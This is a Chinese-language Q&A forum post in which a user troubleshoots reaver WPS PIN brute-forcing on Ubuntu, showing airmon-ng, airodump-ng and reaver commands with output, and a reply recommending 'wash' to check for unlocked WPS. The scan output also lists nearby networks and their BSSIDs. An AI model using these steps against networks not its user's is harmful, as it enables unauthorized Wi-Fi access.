aircrack-ng 有问题吗?

aircrack-ng 有问题吗?

我正在使用 Ubuntu 14.04 LTS。

无线适配器:Atheros Communications, Inc. AR9271 802.11n

无线驱动程序:Ath9k_htc

Aircrack 版本:Aircrack-ng-1.2-Rc1

Reaver 版本 : Reaver-1.4

(libpcap0.8_1.4.0-2_i386、Sqlite3-dev 和其他所需库也已安装)

问题:当我运行命令“airmon-ng start wlan1”时,它给出以下输出:

root@legend-N150P:~# airmon-ng start wlan1
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
487 avahi-daemon
489 avahi-daemon
716 NetworkManager
741 wpa_supplicant

PHY Interface   Driver      Chipset

phy0    wlan0       wl      Broadcom Corporation BCM4313 802.11bgn Wireless Network Adapter (rev 01)
phy3    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n
    (mac80211 monitor mode vif enabled for [phy3]wlan1 on [phy3]wlan1mon)
    (mac80211 station mode vif disabled for [phy3]wlan1)

然后我输入命令“airodum-ng wlan1mon”,它给出以下输出:

CH  8 ][ BAT: 2 hours 56 mins ][ Elapsed: 1 min ][ 2015-02-23 08:51                   

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

5C:F9:6A:C4:88:DE  -42      135        1    0   6  54e  WPA2 CCMP   PSK  LEGEND_10    
90:F6:52:F0:56:38  -88       55       12    0  11  54 . OPN              Al-Afzal 2   
02:0C:E7:34:30:5F  -89       15        0    0   1  54e. WPA2 CCMP   PSK  AndroidAP    
2C:E4:12:21:51:14  -91       45        0    0  11  54   WPA2 CCMP   PSK  Usman Ahmad  
BC:98:89:4C:3D:0B  -91        2        0    0   6  54e. WPA2 CCMP   PSK  PTCL-BB      

BSSID              STATION            PWR   Rate    Lost    Frames  Probe              

(not associated)   5C:F9:6A:C4:88:DE  -43    0 - 1      0       28                     
(not associated)   00:1B:B1:EE:9A:DB  -75    0 - 1      0        7                     

现在我想要破解一个 ESSID 为 LEGEND_10 的网络...为此我输入了命令“Reaver -i wlan1mon -b 5C:F9:6A:C4:88:DE -vv”,它给出以下输出:

root@legend-N150P:~# reaver -i wlan1mon -b 5C:F9:6A:C4:88:DE -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 5C:F9:6A:C4:88:DE
[+] Switching wlan1mon to channel 6
[+] Associated with 5C:F9:6A:C4:88:DE (ESSID: LEGEND_10)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurr
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

问题是什么?

答案1

首先使用此代码检查您要破解的路由器是否启用了 wps;

wash -i wlan1mon

如果 wps lock 为“否”,则只有 reaver 可以破解密码,但如果密码被锁定,则无法使用 reaver。

您可能有不同的接口而不是“wlan0mon”,如wlan0、mon0等。

相关内容